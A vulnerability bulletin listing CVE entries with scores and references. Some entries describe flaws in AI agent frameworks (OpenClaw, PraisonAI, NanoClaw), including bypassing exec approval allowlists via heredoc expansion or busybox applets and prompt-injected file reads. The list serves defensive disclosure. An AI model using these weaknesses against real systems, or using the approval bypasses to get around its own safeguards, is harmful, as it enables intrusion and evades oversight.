| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix DMA FIFO desync on error CQE SQ recovery In case of a TX error CQE, a recovery flow is triggered, mlx5e_reset_txqsq_cc_pc() resets dma_fifo_cc to 0 but not dma_fifo_pc, desyncing the DMA FIFO producer and consumer. After recovery, the producer pushes new DMA entries at the old dma_fifo_pc, while the consumer reads from position 0. This causes us to unmap stale DMA addresses from before the recovery. The DMA FIFO is a purely software construct with no HW counterpart. At the point of reset, all WQEs have been flushed so dma_fifo_cc is already equal to dma_fifo_pc. There is no need to reset either counter, similar to how skb_fifo pc/cc are untouched. Remove the 'dma_fifo_cc = 0' reset. This fixes the following WARNING: WARNING: CPU: 0 PID: 0 at drivers/iommu/dma-iommu.c:1240 iommu_dma_unmap_page+0x79/0x90 Modules linked in: mlx5_vdpa vringh vdpa bonding mlx5_ib mlx5_vfio_pci ipip mlx5_fwctl tunnel4 mlx5_core ib_ipoib geneve ip6_gre ip_gre gre nf_tables ip6_tunnel rdma_ucm ib_uverbs ib_umad vfio_pci vfio_pci_core act_mirred act_skbedit act_vlan vhost_net vhost tap ip6table_mangle ip6table_nat ip6table_filter ip6_tables iptable_mangle cls_matchall nfnetlink_cttimeout act_gact cls_flower sch_ingress vhost_iotlb iptable_raw tunnel6 vfio_iommu_type1 vfio openvswitch nsh rpcsec_gss_krb5 auth_rpcgss oid_registry xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink iptable_nat nf_nat xt_addrtype br_netfilter overlay zram zsmalloc rpcrdma ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm ib_core fuse [last unloaded: nf_tables] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.13.0-rc5_for_upstream_min_debug_2024_12_30_21_33 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:iommu_dma_unmap_page+0x79/0x90 Code: 2b 4d 3b 21 72 26 4d 3b 61 08 73 20 49 89 d8 44 89 f9 5b 4c 89 f2 4c 89 e6 48 89 ef 5d 41 5c 41 5d 41 5e 41 5f e9 c7 ae 9e ff <0f> 0b 5b 5d 41 5c 41 5d 41 5e 41 5f c3 66 2e 0f 1f 84 00 00 00 00 Call Trace: <IRQ> ? __warn+0x7d/0x110 ? iommu_dma_unmap_page+0x79/0x90 ? report_bug+0x16d/0x180 ? handle_bug+0x4f/0x90 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 ? iommu_dma_unmap_page+0x79/0x90 ? iommu_dma_unmap_page+0x2e/0x90 dma_unmap_page_attrs+0x10d/0x1b0 mlx5e_tx_wi_dma_unmap+0xbe/0x120 [mlx5_core] mlx5e_poll_tx_cq+0x16d/0x690 [mlx5_core] mlx5e_napi_poll+0x8b/0xac0 [mlx5_core] __napi_poll+0x24/0x190 net_rx_action+0x32a/0x3b0 ? mlx5_eq_comp_int+0x7e/0x270 [mlx5_core] ? notifier_call_chain+0x35/0xa0 handle_softirqs+0xc9/0x270 irq_exit_rcu+0x71/0xd0 common_interrupt+0x7f/0xa0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 | 2026-05-08 | 8.2 | CVE-2026-43466 | https://git.kernel.org/stable/c/821f85d619f7f22cda7b9d7de89cf5eeb1d11544 https://git.kernel.org/stable/c/6eb68ecc5acc3b319986566c595990b8a7265b23 https://git.kernel.org/stable/c/6f41f7812bfa7f991b732a4b45c5c52fc4be3b4e https://git.kernel.org/stable/c/383b37c04a4827ba60b2bafc1a6cdfd995aed58f https://git.kernel.org/stable/c/9c5ee9b981ee050b73fdf3f4a2464d6f1a8e10a8 https://git.kernel.org/stable/c/ce1b19dd0684eeb68a124c11085bd611260b36d9 https://git.kernel.org/stable/c/829efcccfa8f69db5dc8332961295587d218cee6 https://git.kernel.org/stable/c/1633111d69053512d099658d4a05fc736fab36b0 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.12 contains a server-side request forgery vulnerability in QQBot reply media URL handling that allows attackers to fetch arbitrary content. Attackers can exploit this by providing malicious media URLs that trigger SSRF requests, with fetched bytes subsequently re-uploaded through the channel. | 2026-05-05 | 8.2 | CVE-2026-43526 | GitHub Security Advisory (GHSA-2767-2q9v-9326) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw < 2026.4.12 - Server-Side Request Forgery via QQBot Reply Media URL Handling |
| OpenClaw--OpenClaw | OpenClaw versions 2026.2.23 before 2026.4.12 contain a weakened exec approval binding vulnerability in busybox and toybox applet execution that allows attackers to obscure which applet would actually run. Attackers can exploit opaque multi-call binaries to bypass exec approval mechanisms and weaken risk classification of unsafe applet invocations. | 2026-05-05 | 8.8 | CVE-2026-43530 | GitHub Security Advisory (GHSA-2cq5-mf3v-mx44) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.23 < 2026.4.12 - Weakened Exec Approval Binding via busybox and toybox Applet Execution |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an arbitrary file read vulnerability in QQBot media tags that allows attackers to reference host-local paths outside the intended media storage boundary. Attackers can craft malicious reply text containing media tags to disclose arbitrary local files through outbound media handling. | 2026-05-05 | 8.6 | CVE-2026-43533 | GitHub Security Advisory (GHSA-66r7-m7xm-v49h) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Arbitrary Local File Read via QQBot Media Tags |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains an authentication bypass vulnerability allowing untrusted workspace plugins to be auto-enabled during non-interactive onboarding when provider auth choices are shadowed. Attackers can exploit this by crafting malicious workspace plugins that are automatically selected and enabled during authentication setup without explicit user consent. | 2026-05-05 | 8.8 | CVE-2026-43569 | GitHub Security Advisory (GHSA-939r-rj45-g2rj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Untrusted Provider Plugin Auto-enablement via Workspace Provider Auth |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a plugin trust bypass vulnerability that allows channel setup catalog lookups to resolve workspace plugin shadows before bundled channel plugins. Attackers can exploit this by crafting malicious workspace plugins that bypass intended trust gates during setup-time plugin loading. | 2026-05-05 | 8.8 | CVE-2026-43571 | GitHub Security Advisory (GHSA-82qx-6vj7-p8m2) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Untrusted Workspace Plugin Shadow Resolution in Channel Setup |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an insufficient environment variable denylist vulnerability in its exec environment policy that allows operator-supplied overrides of high-risk interpreter startup variables including VIMINIT, EXINIT, LUA_INIT, and HOSTALIASES. Attackers can exploit this by manipulating these environment variables to influence downstream execution behavior or network connectivity. | 2026-05-06 | 8.8 | CVE-2026-43584 | GitHub Security Advisory (GHSA-vfp4-8x56-j7c5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Insufficient Environment Variable Denylist in Exec Policy |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 captures resolved bearer-auth configuration at startup, allowing revoked tokens to remain valid after SecretRef rotation. Gateway HTTP and WebSocket handlers fail to re-resolve authentication per-request, enabling attackers to use rotated-out bearer tokens for unauthorized gateway access. | 2026-05-06 | 8.1 | CVE-2026-43585 | GitHub Security Advisory (GHSA-xmxx-7p24-h892) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Bearer Token Validation Bypass via Stale SecretRef Resolution |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.7.16, the runWidget function in src/app/widgets/load-widget.js constructs a file path by directly concatenating user‑supplied widget identifiers without any sanitisation. Because runWidget is exposed to the renderer process via an asynchronous IPC handler with no input validation, an attacker who achieves JavaScript execution inside the renderer (for example, through a malicious plugin or a cross‑site scripting flaw in the built‑in webview) can abuse a path traversal (../) to load and execute an arbitrary JavaScript file anywhere on the victim's filesystem. This gives the attacker local code execution with the full privileges of the electerm process, leading to complete system compromise. This issue has been patched in version 3.7.16. | 2026-05-08 | 8.4 | CVE-2026-43940 | https://github.com/electerm/electerm/security/advisories/GHSA-f77v-9vpc-6pjm https://github.com/electerm/electerm/releases/tag/v3.7.16 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an authorization bypass vulnerability in Matrix room control-command authorization that trusts DM pairing-store entries. Attackers with DM-paired sender IDs can execute room control commands without being in configured allowlists by posting in bot rooms, potentially enabling privileged OpenClaw behavior. | 2026-05-06 | 8.8 | CVE-2026-44110 | GitHub Security Advisory (GHSA-2gvc-4f3c-2855) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw < 2026.4.15 - Authorization Bypass in Matrix Room Control Commands via DM Pairing Store |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains an exec allowlist analysis vulnerability allowing shell expansion hiding in unquoted heredoc bodies. Attackers can bypass allowlist validation by embedding shell expansion tokens in heredoc bodies to execute unapproved commands at runtime. | 2026-05-06 | 8.8 | CVE-2026-44115 | GitHub Security Advisory (GHSA-x3h8-jrgh-p8jx) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Shell Expansion Bypass in Unquoted Heredocs via Exec Allowlist |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a server-side request forgery vulnerability in the Zalo plugin's sendPhoto function that fails to validate outbound photo URLs through the SSRF guard. Attackers can bypass SSRF protection by providing malicious photo URLs to the Zalo Bot API, enabling unauthorized access to internal resources. | 2026-05-06 | 8.6 | CVE-2026-44116 | GitHub Security Advisory (GHSA-2hh7-c75g-qj2r) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Server-Side Request Forgery in Zalo Photo URL Validation |
| ProFTPD--ProFTPD | In ProFTPD through 1.3.9a before 7666224, a SQL injection vulnerability in sqltab_fetch_clients_cb() in contrib/mod_wrap2_sql.c allows a remote attacker to inject arbitrary SQL commands via a crafted domain name that is accessed in a reverse DNS lookup. When "UseReverseDNS on" is enabled, the attacker-supplied hostname is passed unescaped into SQL queries. The character restrictions of DNS names may affect exploitability. | 2026-05-05 | 8.1 | CVE-2026-44331 | https://github.com/proftpd/proftpd/issues/2057 https://github.com/proftpd/proftpd/commit/766622456440fbca33abd7927c523673a11d1ed1 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 4.5.139 to before version 4.6.32, CVE-2026-40287's fix gated tools.py auto-import behind PRAISONAI_ALLOW_LOCAL_TOOLS=true in two files (tool_resolver.py, api/call.py). A third import sink in praisonai/templates/tool_override.py was missed and remains unguarded. It is reached by the recipe runner on every recipe execution and is remotely triggerable through POST /v1/recipes/run with a recipe value pointing at any local absolute path or any GitHub repo (because SecurityConfig.allow_any_github defaults to True). The attacker drops a tools.py next to TEMPLATE.yaml; the server exec_module()s it. No auth required by default, no environment opt-in required. This issue has been patched in version 4.6.32. | 2026-05-08 | 8.4 | CVE-2026-44334 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-xcmw-grxf-wjhj |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.37 and praisonaiagents version 1.6.37, praisonaiagents resolves unresolved tool names against module globals and __main__ after it fails to match the declared tool list and the registry. With the default agent configuration, _perm_allow is None, so undeclared non-dangerous tool names are not rejected by the permission gate. An attacker who can influence tool-call names can therefore invoke unintended application callables that were never declared as tools. This issue has been patched in praisonai version 4.6.37 and praisonaiagents version 1.6.37. | 2026-05-08 | 8.6 | CVE-2026-44339 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gmjg-hv98-qggq |
| MailEnable--MailEnable Enterprise Premium | MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions. | 2026-05-08 | 8.1 | CVE-2026-44400 | https://www.mailenable.com/Premium-ReleaseNotes.txt https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin |
| wedevs--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to Deserialization of Untrusted Data in versions up to, and including, 4.3.1 This is due to insufficient input validation and type checking on the wpuf_files parameter during form submission, combined with unconditional deserialization via maybe_unserialize() when displaying post content. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary PHP objects, which can be leveraged to execute arbitrary code, delete arbitrary files, or perform other malicious actions if a POP chain is present on the target system. | 2026-05-08 | 8.8 | CVE-2026-5127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b5d27cc-c6eb-4c5c-8ee1-30483b91c6fd?source=cve https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/wpuf-functions.php#L959 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/wpuf-functions.php#L959 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/wpuf-functions.php#L1103 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/wpuf-functions.php#L1103 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L679 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L679 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L704 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L704 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L429 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L429 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php#L502 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Traits/FieldableTrait.php#L502 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php#L36 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.10/includes/Ajax/Frontend_Form_Ajax.php#L36 https://plugins.trac.wordpress.org/changeset/3514258/wp-user-frontend/trunk/includes/Traits/FieldableTrait.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-user-frontend/tags/4.3.1&new_path=%2Fwp-user-frontend/tags/4.3.2 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Stored XSS. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 8.8 | CVE-2026-5784 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| Ivanti--Endpoint Manager Mobile | An Improper Access Control vulnerability in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote authenticated attacker to gain administrative access. | 2026-05-07 | 8.8 | CVE-2026-5786 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| Ivanti--Endpoint Manager Mobile | An Improper Certificate Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to impersonate registered Sentry hosts and obtain valid CA-signed client certificates. | 2026-05-07 | 8.9 | CVE-2026-5787 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross-Site Scripting (XSS). This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 8.8 | CVE-2026-6002 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| MuffinGroup--Betheme | The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the upload_icons() function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files (including PHP) and achieve remote code execution via the Icons icon-pack upload flow. | 2026-05-05 | 8.8 | CVE-2026-6261 | https://www.wordfence.com/threat-intel/vulnerabilities/id/722c04c3-8f74-4081-b3a4-cb1ae2027312?source=cve https://support.muffingroup.com/changelog/ |
| Red Hat--Red Hat Ansible Automation Platform 2.5 for RHEL 8 | A flaw was found in the AAP gateway. The user auto-link strategy, introduced in AAP 2.6, automatically links an external Identity Provider (IDP) identity to an existing AAP user account based on email matching without verifying email ownership. This allows a remote attacker to potentially hijack a victim's account or gain unauthorized access to other accounts, including administrative accounts, by manipulating the IDP-provided email. | 2026-05-04 | 8.3 | CVE-2026-6266 | RHSA-2026:13508 RHSA-2026:13512 RHSA-2026:13545 https://access.redhat.com/security/cve/CVE-2026-6266 RHBZ#2458142 |
| www[.]pgbouncer[.]org--PgBouncer | The SCRAM code in PgBouncer before 1.25.2 did not check the return value of strlcat() correctly when building the contents of the SCRAM client-final-message. A malicious backend that sends a SCRAM server-final-message with a long nonce can trigger a stack overflow. | 2026-05-09 | 8.1 | CVE-2026-6665 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| www[.]pgbouncer[.]org--PgBouncer | The SCRAM code in PgBouncer before 1.25.2 did not check the return value of strlcat() correctly when building the contents of the SCRAM client-final-message. A malicious backend that sends a SCRAM server-final-message with a long nonce can trigger a stack overflow. | 2026-05-09 | 8.1 | CVE-2026-6665 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Arbitrary File Upload in versions 7.0.0 to 7.0.10 via the '_get_media_url' and '_check_file_path' function. This is due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files that may be executable, which makes remote code execution possible. The vulnerability was partially patched in version 7.0.10 and fully patched in version 7.0.11. | 2026-05-07 | 8.8 | CVE-2026-6692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e802a6-d2f1-47cc-883a-89110e569168?source=cve https://www.sliderrevolution.com/ |
| davidanderson--WP-Optimize Cache, Compress images, Minify & Clean database to boost page speed & performance | The WP-Optimize - Cache, Compress images, Minify & Clean database to boost page speed & performance plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the unscheduled_original_file_deletion function in all versions up to, and including, 4.5.2 This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This is possible because 'original-file' is a public (non-protected) meta key - it does not begin with an underscore - allowing Authors to freely create or modify it on their own attachment posts via the standard Edit Media form or the REST API. | 2026-05-07 | 8.1 | CVE-2026-7252 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc815ef2-dd02-4faa-b202-dd1552f889db?source=cve https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L1649 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L1649 https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L1645 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L1645 https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-updraft-smush-manager.php#L81 https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.5.2/includes/class-updraft-smush-manager.php#L81 https://plugins.trac.wordpress.org/changeset/3518513/wp-optimize/trunk/includes/class-updraft-smush-manager.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-optimize/tags/4.5.2&new_path=%2Fwp-optimize/tags/4.5.3 |
| Eclipse Foundation--Eclipse BaSyx | In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS). | 2026-05-05 | 8.6 | CVE-2026-7412 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423 https://gitlab.eclipse.org/security/cve-assignment/-/issues/103 |
| Totolink--WA300 | A vulnerability was determined in Totolink WA300 5.2cu.7112_B20190227. This issue affects the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Executing a manipulation of the argument File can lead to buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-04 | 8.8 | CVE-2026-7717 | VDB-360893 | Totolink WA300 POST Request cstecgi.cgi UploadCustomModule buffer overflow VDB-360893 | CTI Indicators (IOB, IOC, IOA) Submit #807193 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-UploadCustomModule-34553a41781f80a8a287e48a7fb04de9 https://www.totolink.net/ |
| Totolink--N300RH | A weakness has been identified in Totolink N300RH 3.2.4-B20220812. Affected by this issue is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Executing a manipulation of the argument FileName can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-04 | 8.8 | CVE-2026-7748 | VDB-360923 | Totolink N300RH POST Request cstecgi.cgi setUpgradeFW buffer overflow VDB-360923 | CTI Indicators (IOB, IOC, IOA) Submit #807202 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setUpgradeFW-34553a41781f80abb1d1c627d7ff4329?pvs=73 https://www.totolink.net/ |
| Totolink--N300RH | A security vulnerability has been detected in Totolink N300RH 3.2.4-B20220812. This affects the function setWanConfig of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument priDns leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 8.8 | CVE-2026-7749 | VDB-360924 | Totolink N300RH POST Request cstecgi.cgi setWanConfig buffer overflow VDB-360924 | CTI Indicators (IOB, IOC, IOA) Submit #807203 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setWanConfig-34553a41781f80ed8500d9b8d54074f2 https://www.totolink.net/ |
| Totolink--N300RH | A vulnerability was detected in Totolink N300RH 3.2.4-B20220812. This vulnerability affects the function setMacFilterRules of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument mac_address results in buffer overflow. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-04 | 8.8 | CVE-2026-7750 | VDB-360925 | Totolink N300RH POST Request cstecgi.cgi setMacFilterRules buffer overflow VDB-360925 | CTI Indicators (IOB, IOC, IOA) Submit #807204 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setMacFilterRules-34553a41781f809cb952cdcb71ce90d8 https://www.totolink.net/ |
| SmarterTools Inc.--SmarterMail | SmarterTools SmarterMail builds prior to 9560 contain a local file inclusion vulnerability in the /api/v1/report/summary/{type} API endpoint that allows authenticated users to read arbitrary .json files on the system. Attackers can exploit this vulnerability combined with weak encryption algorithms and hardcoded keys to decrypt and access stored passwords and 2FA secrets for all users. | 2026-05-08 | 8.1 | CVE-2026-7807 | https://www.smartertools.com/smartermail/release-notes/current https://www.vulncheck.com/advisories/smartertools-smartermail-build-9560-server-local-file-inclusion-via-the-api-v1-report-summary-type-api |
| GeoVision Inc.--ASManager | A remote code execution vulnerability exists in Notification Settings on GeoVision GV-ASWeb 6.2.0. An authenticated user with System Setting permissions can execute arbitrary commands on the server by sending a crafted HTTP POST request to the ASWebCommon.srf backend endpoint to bypass the frontend restrictions. | 2026-05-06 | 8.8 | CVE-2026-7841 | https://www.geovision.com.tw/cyber_security.php |
| D-Link--DI-8100 | A vulnerability was detected in D-Link DI-8100 16.07.26A1. Affected by this issue is the function tggl_asp of the file /tggl.asp of the component HTTP Request Handler. Performing a manipulation of the argument Name results in buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-05-05 | 8.8 | CVE-2026-7855 | VDB-361132 | D-Link DI-8100 HTTP Request tggl.asp tggl_asp buffer overflow VDB-361132 | CTI Indicators (IOB, IOC, IOA) Submit #807841 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/tggl_asp_overflow.md https://www.dlink.com/ |
| Qwibit--NanoClaw | NanoClaw version 1.2.0 and prior contains a host/container filesystem boundary vulnerability in outbound attachment handling and outbox cleanup that allows a compromised or prompt-injected container to read files outside the intended outbox directory by supplying crafted messages_out.id and content.files values or creating symlinked outbox files. Attackers can exploit this vulnerability to trigger host-side reads of arbitrary files and in some cases achieve recursive deletion of paths outside the intended cleanup target. | 2026-05-06 | 8.8 | CVE-2026-7875 | https://github.com/qwibitai/nanoclaw/pull/2001 https://github.com/qwibitai/nanoclaw/commit/7814e45570edf0024a1a5c2ba9fbc9cb3a49f7f7 https://github.com/qwibitai/nanoclaw/releases/tag/v1.2.0 |
| Totolink--X5000R | A vulnerability has been found in Totolink X5000R 9.1.0u.6369_B20230113. This vulnerability affects the function sub_458E40 of the file /boafrm/formDdns. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-08 | 8.8 | CVE-2026-8137 | VDB-361926 | Totolink X5000R formDdns sub_458E40 buffer overflow VDB-361926 | CTI Indicators (IOB, IOC, IOA) Submit #808863 | Totolink X5000R V9.1.0u.6369_B20230113 Stack-based Buffer Overflow https://github.com/Kiciot/cve/issues/4 https://www.totolink.net/ |
| Tenda--CX12L | A vulnerability was found in Tenda CX12L 16.03.53.12. This issue affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg". The manipulation results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-08 | 8.8 | CVE-2026-8138 | VDB-361927 | Tenda CX12L SetPptpServerCfg” formSetPPTPServer stack-based overflow VDB-361927 | CTI Indicators (IOB, IOC, IOA) Submit #808867 | Tenda CX12L V16.03.53.12 Stack-based Buffer Overflow https://github.com/cve-a/lvdan/issues/6 https://www.tenda.com.cn/ |
| Amazon--Amazon Redshift JDBC Driver | An issue exists in Amazon Redshift JDBC Driver versions prior to 2.2.2. Under certain conditions, the driver could load and execute arbitrary classes when processing JDBC connection URL parameters. An actor who can influence the connection URL could potentially execute code in the application context, provided a suitable class is available on the application's classpath. To mitigate this issue, users should upgrade to version 2.2.2 or later. | 2026-05-08 | 8.1 | CVE-2026-8178 | https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2 https://aws.amazon.com/security/security-bulletins/2026-028-aws/ https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-wmmv-vvg5-993q |
| EFM--ipTIME A8004T | A security vulnerability has been detected in EFM ipTIME A8004T 14.18.2. This vulnerability affects the function formWifiBasicSet of the file /goform/WifiBasicSet. The manipulation of the argument security_5g leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 8.8 | CVE-2026-8234 | VDB-362454 | EFM ipTIME A8004T WifiBasicSet formWifiBasicSet stack-based overflow VDB-362454 | CTI Indicators (IOB, IOC, IOA) Submit #808865 | IPTIME A8004T 14.18.2 Stack-based Buffer Overflow https://github.com/Kiciot/cve/issues/5 |
| memono--Notepad | memono Notepad 4.2 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character buffers into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash on iOS devices. | 2026-05-10 | 7.5 | CVE-2021-47944 | ExploitDB-49977 VulnCheck Advisory: memono Notepad 4.2 Denial of Service via Buffer Overflow |
| argus--Argus Surveillance DVR | Argus Surveillance DVR 4.0 contains an unquoted service path vulnerability in the DVRWatchdog service that allows local attackers to escalate privileges by exploiting the service binary path. Attackers can place a malicious executable in the Program Files directory to be executed with LocalSystem privileges when the service starts. | 2026-05-10 | 7.8 | CVE-2021-47945 | ExploitDB-50261 VulnCheck Advisory: Argus Surveillance DVR 4.0 Unquoted Service Path Privilege Escalation |
| Backupbliss--WordPress Plugin Backup Migration | WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps. | 2026-05-05 | 7.5 | CVE-2023-54346 | ExploitDB-51445 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Backup Migration 1.2.8 Unauthenticated Database Backup Download |
